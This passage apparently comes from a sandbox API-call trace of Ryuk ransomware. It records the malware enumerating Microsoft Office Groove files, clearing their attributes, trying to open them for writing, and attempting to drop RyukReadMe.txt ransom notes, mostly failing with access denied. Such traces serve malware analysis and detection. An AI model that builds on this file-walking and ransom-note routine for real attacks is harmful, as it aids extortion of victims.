VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.128] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.128] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.128] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\tab_on.gif", dwFileAttributes=0x80) returned 0 [0137.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.129] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.129] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.129] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.129] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.129] SetLastError (dwErrCode=0x0) [0137.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.129] GetLastError () returned 0x5 [0137.129] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.129] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.129] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.129] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Sts2.css", dwFileAttributes=0x80) returned 0 [0137.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Sts2.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.130] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.130] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.130] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.130] SetLastError (dwErrCode=0x0) [0137.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.130] GetLastError () returned 0x5 [0137.130] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.130] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.130] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.130] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.130] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.130] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\background.gif", dwFileAttributes=0x80) returned 0 [0137.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.131] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.131] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.131] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.131] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\header.gif", dwFileAttributes=0x80) returned 0 [0137.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\header.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.131] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.131] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.131] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.131] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\tab_off.gif", dwFileAttributes=0x80) returned 0 [0137.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.132] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.132] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.132] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.132] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\tab_on.gif", dwFileAttributes=0x80) returned 0 [0137.132] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.132] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.132] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.133] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.133] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.133] SetLastError (dwErrCode=0x0) [0137.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.133] GetLastError () returned 0x5 [0137.133] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.133] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.133] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.133] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.133] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl.css", dwFileAttributes=0x80) returned 0 [0137.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.133] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.133] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.134] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.134] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.134] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Teal.css", dwFileAttributes=0x80) returned 0 [0137.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Teal.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\teal.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.134] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.135] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.135] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.135] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\TexturedBlue.css", dwFileAttributes=0x80) returned 0 [0137.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\TexturedBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\texturedblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.135] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.135] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.135] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.135] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.135] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\VelvetRose.css", dwFileAttributes=0x80) returned 0 [0137.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\VelvetRose.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\velvetrose.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.136] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.136] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.136] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0137.136] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.136] SetLastError (dwErrCode=0x0) [0137.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.136] GetLastError () returned 0x5 [0137.136] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.136] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.136] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.136] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.136] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsVersion1Warning.htm", dwFileAttributes=0x80) returned 0 [0137.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsversion1warning.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.137] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.137] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.137] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.137] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 0 [0137.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewattachmenticons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.138] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.138] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.138] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.138] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIconsMask.bmp", dwFileAttributes=0x80) returned 0 [0137.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewattachmenticonsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.138] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.139] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.139] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.139] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewFrame.html", dwFileAttributes=0x80) returned 0 [0137.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewframe.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.139] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.139] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.139] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.139] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewTemplate.html", dwFileAttributes=0x80) returned 0 [0137.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.140] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.140] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.140] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.140] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormToolImages.jpg", dwFileAttributes=0x80) returned 0 [0137.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formtoolimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.141] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.141] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.141] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.141] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\form_edit.js", dwFileAttributes=0x80) returned 0 [0137.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\form_edit.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form_edit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.141] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.141] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.142] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.142] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\LAUNCH.GIF", dwFileAttributes=0x80) returned 0 [0137.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\LAUNCH.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\launch.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.142] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.142] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.142] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.142] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\macroprogress.gif", dwFileAttributes=0x80) returned 0 [0137.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\macroprogress.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\macroprogress.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.143] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.143] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.143] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.143] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.143] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\PublicFunctions.js", dwFileAttributes=0x80) returned 0 [0137.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\PublicFunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\publicfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.144] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.144] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.144] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.144] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.145] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_alignleft.gif", dwFileAttributes=0x80) returned 0 [0137.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_alignleft.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_alignleft.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.145] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.145] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.145] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.145] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.146] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_alignright.gif", dwFileAttributes=0x80) returned 0 [0137.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_alignright.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_alignright.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.146] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.146] VirtualFree (lpAddress=0x350000, 